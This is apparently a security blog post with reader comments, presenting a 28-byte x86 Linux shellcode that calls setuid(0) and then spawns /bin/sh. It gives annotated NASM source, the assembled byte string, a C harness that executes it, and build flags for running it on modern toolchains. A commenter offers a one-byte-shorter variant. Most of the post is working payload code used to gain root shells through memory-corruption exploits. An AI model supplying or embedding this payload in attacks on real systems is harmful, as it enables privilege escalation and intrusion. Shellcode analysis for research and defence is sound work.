
Smallest GNU/Linux x86 setuid(0) & exec(“/bin/sh”,0,0) Stable shellcode – 28 bytes

After everything we had done, vlan7 pointed out to me that the previous shellcodes we had been working on were written wrong: both of us were putting the uid for the setuid call in the ecx register instead of ebx (on i386 Linux the first syscall argument goes in ebx, the second in ecx and the third in edx, so setuid(uid) needs the uid in ebx). An unforgivable mistake, no doubt.

So after thinking it over, touching up the shellcode and testing it in different environments, modifying the stack, the registers, etc., I arrived at this stable 28-byte shellcode that performs both calls, setuid and execve, correctly. It is stable because it sets every register it relies on itself: ebx and ecx are zeroed explicitly, eax is loaded with lea from a zeroed register (so no NUL byte appears in the encoding), and cdq clears edx while eax is still positive, so nothing depends on whatever garbage the registers hold at entry:

Code for nasm:

global _start
section .text
_start:
;setuid(0)
xor ebx,ebx          ; ebx = 0 -> uid, the first syscall argument
lea eax,[ebx+17h]    ; eax = 0x17 = 23 = __NR_setuid, no NUL byte in the encoding
cdq                  ; edx = 0 (eax is positive); reused as envp below
int 80h              ; setuid(0); the return value left in eax is ignored
;execve("/bin/sh",0,0)
xor ecx,ecx          ; ecx = 0 -> argv = NULL
push ecx             ; NUL terminator for the path string
push 0x68732f6e      ; "n/sh"
push 0x69622f2f      ; "//bi" -> the stack now holds "//bin/sh\0" (8 chars, no NUL needed inside)
lea eax,[ecx+0Bh]    ; eax = 0x0b = 11 = __NR_execve (eax was clobbered by setuid's return)
mov ebx,esp          ; ebx -> "//bin/sh"
int 80h              ; execve("//bin/sh", NULL, NULL)

C code:

#include <stdio.h>

/* The 28 bytes assembled from the nasm listing above; none of them is 0x00. */
const char shellcode[]= "\x31\xdb"             /* xor ebx,ebx        */
			"\x8d\x43\x17"         /* lea eax,[ebx+0x17] */
			"\x99"                 /* cdq                */
			"\xcd\x80"             /* int 0x80 (setuid)  */
			"\x31\xc9"             /* xor ecx,ecx        */
			"\x51"                 /* push ecx           */
			"\x68\x6e\x2f\x73\x68" /* push "n/sh"        */
			"\x68\x2f\x2f\x62\x69" /* push "//bi"        */
			"\x8d\x41\x0b"         /* lea eax,[ecx+0x0b] */
			"\x89\xe3"             /* mov ebx,esp        */
			"\xcd\x80";            /* int 0x80 (execve)  */

int main()
{
	printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE"
			" WITHOUT NULLS THAT SPAWNS A SHELL"
			"\n\nCoded by Chema Garcia (aka sch3m4)"
			"\n\t + sch3m4@safetybits.net"
			"\n\t + http://safetybits.net"
			"\n\n[+] Date: 29/11/2008"
			"\n[+] Thanks to: vlan7"
			"\n\n[+] Shellcode Size: %d bytes\n\n",
			(int)(sizeof(shellcode)-1));

	/* Jumps straight into the byte array, so the page holding it must be
	 * executable. That was true of the data segment on the toolchains of the
	 * time; with a modern gcc build it 32-bit with an executable stack
	 * (gcc -m32 -z execstack), which makes the kernel map the whole image
	 * readable-implies-executable, or copy the bytes into an RWX mmap first.
	 * A shell is spawned either way; it is a root shell only when the process
	 * already runs as root (or setuid root), because setuid(0)'s result is
	 * not checked. */
	(*(void (*)()) shellcode)();

	return 0;
}
  1. February 14th, 2010 at 04:04 | #1

    I am very impressed with the article I have just read. I hope the writer of safetybits.net can continue to provide so much worthwhile information and unforgettable experience to safetybits.net readers. There is not much to state except the following universal truth: a person who says something is impossible is usually interrupted by the person doing it. I will be back.

  2. Tom Madsen
    March 8th, 2010 at 01:23 | #2

    Wouldn’t:

    bits 32
    global _start
    section .text
    _start:
    xor ebx,ebx          ; uid = 0
    push byte 23         ; __NR_setuid
    runit:
    pop eax              ; eax = syscall number pushed just before
    cdq                  ; edx = 0
    int 0x80
    xor ecx,ecx          ; argv = NULL
    push ecx             ; terminator
    push 0x68732f6e      ; "n/sh"
    push 0x69622f2f      ; "//bi"
    mov ebx,esp          ; ebx -> "//bin/sh"
    push byte 11         ; __NR_execve
    jmp short runit      ; pop eax; cdq; int 0x80 -> execve

    be one byte shorter?

  3. April 25th, 2010 at 20:22 | #3

    I’m sorry, I’ve been offline for a long time.

    About your comment, I haven't tested it; however, if it always works, taking register contents (garbage) into account, it could be valid.

    On the other hand, it's possible to do it smaller; I remember versions made by vlan7 or me of about 24/25 bytes, but unstable.

    Good work ;)
